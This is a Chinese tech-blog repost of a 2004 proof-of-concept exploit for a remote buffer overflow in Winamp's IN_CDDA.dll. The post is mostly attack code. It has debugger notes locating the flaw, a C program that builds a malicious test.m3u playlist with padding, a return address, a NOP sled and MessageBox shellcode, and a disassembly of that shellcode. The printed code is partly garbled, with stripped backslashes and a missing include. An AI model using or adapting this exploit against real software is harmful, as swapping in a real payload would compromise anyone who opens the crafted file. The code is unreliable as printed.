ITPub博客

首页 > Linux操作系统 > Linux操作系统 > Winamp

Winamp

原创 Linux操作系统 作者:coolwinds 时间:2004-11-25 19:55:24 0 删除 编辑

Winamp <= 5.06 "IN_CDDA.dll" Remote Buffer Overflow Exploit

[@more@]
Solution : (Unpatched vulnerability) -> Uninstall Winamp or disassociate .cda and .m3u extensions from winamp


/* 

Credits go to the author

How to fix and study the bug:

* - The cdda library only reserves 20 bytes for names when files are "*.cda"
* - run Winamp with ollye
* - when loaded locate and break at:

10009BBB 8D4C24 20 LEA ECX,DWORD PTR SS:[ESP+20]
10009BBF 84C0 TEST AL,AL
10009BC1 74 0F JE SHORT in_cdda.10009BD2
10009BC3 3C 2E CMP AL,2E
10009BC5 74 0B JE SHORT in_cdda.10009BD2

that code copies and overwrites the stack if no '.' is found in the 
first 20 bytes of the m3u entry. Entry must not have #EXTINF data or 
it won't resolve.

* - name that entry like "C:1234567890abXXXX.cda" and xxxx will be your return address. 
stack will be overwritten and exception occurs. When going out of that exception you'll be launched to padding.
* - look for .data section of in_cdda.dll and locate the shellcode or string, and update if needed the
field Location of shellcode (see host info). In my case it's x1002355b.
*/


#include  //File ops.

//m3u File format
//http://hanna.pyxidis.org/tech/m3u.html

// Host info:
// Name=ntdll (system)
// File version=5.1.2600.1217 (xpsp2.030429-213)
// Path=H:WINDOWSSystem32ntdll.dll

// Name=in_cdda
// Base=10000000 
// Size=00031000 (200704.)
// Entry=1000CE1A in_cdda. 
// Path=H:Archivos de programaWinampPluginsin_cdda.dll

#define HEADER "#EXTM3Un"

//Simple MessageBox Shellcode spanish XP Pro: xpsp2.030429-213 
//Address of MessageBoxA in xpsp2.030429-213: 77D3b064
char shellcode[]= 
"C:1234567890ab" //Padding
"x5bx35x02x10" //Location of shellcode : +-x10 bytes
"x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90xB8"
"x75xC1xe4x88" //Address of MessageBoxA + 0x11111111
"x2Dx11x11x11x11x50x59x33xc0x50x68x42x6f"
"x6fx6dx54x5ax50x50x52x50x53x51xc3.cdanr";

//Shellcode:
//B8 75C1e488 MOV EAX,88e4C175 ; MessageBoxA + 0x11111111 to
//2D 11111111 SUB EAX,11111111 ; Make characters readable
//50 PUSH EAX ; xchg registers : eax = 77D3b064
//59 POP ECX ; Offset to API.
//33C0 XOR EAX,EAX ; Create Null
//50 PUSH EAX ; Put ascii0 end of string
//68 61616161 PUSH 6d6f6f42 ; Create string.
//54 PUSH ESP ; Get the offset to the 
//5A POP EDX ; Message String
//MessageBox call
//50 PUSH EAX ; Null Pointer
//50 PUSH EAX ; Null Pointer
//52 PUSH EDX ; Message
//50 PUSH EAX ; Null Pointer
//53 PUSH EBX ; Return address: 0x00000000
//51 PUSH ECX ; Address of MessageBoxA
//C3 RETN ; Jump 


int main(int argc, char* argv[]) {
FILE *fp;
char *sc=(char *)malloc(sizeof(shellcode)+1);

printf ("winamp 5.x m3u parsing poc - advisorie by Brett Mooren");
printf ("Exploit : www.k-otik.com/exploits/20041124.winampm3u.cn");
printf ("Simple MessageBox Shellcode spanish XP Pro: xpsp2.030429-213n");
printf ("Address of MessageBoxA in xpsp2.030429-213: 77D3b064n");
printf ("Tested on Winamp 5.02nn");

if (sc == NULL) {
printf ("malloc errorn");
return -1;
}

memset(sc,'',sizeof(sc));
memcpy(sc, shellcode, sizeof(shellcode) );

fp = fopen ("test.m3u","w+");
if (!fp) {
printf (" error opening file.n");
return -1;
}

fwrite (HEADER, 1, strlen (HEADER), fp);
fwrite (sc , 1, strlen(sc) , fp);
fclose (fp);

printf ("file test.m3u created. Just double click it.n");
return 0;

}

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/83980/viewspace-782130/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论

注册时间:2012-10-23

  • 博文量
    253
  • 访问量
    950528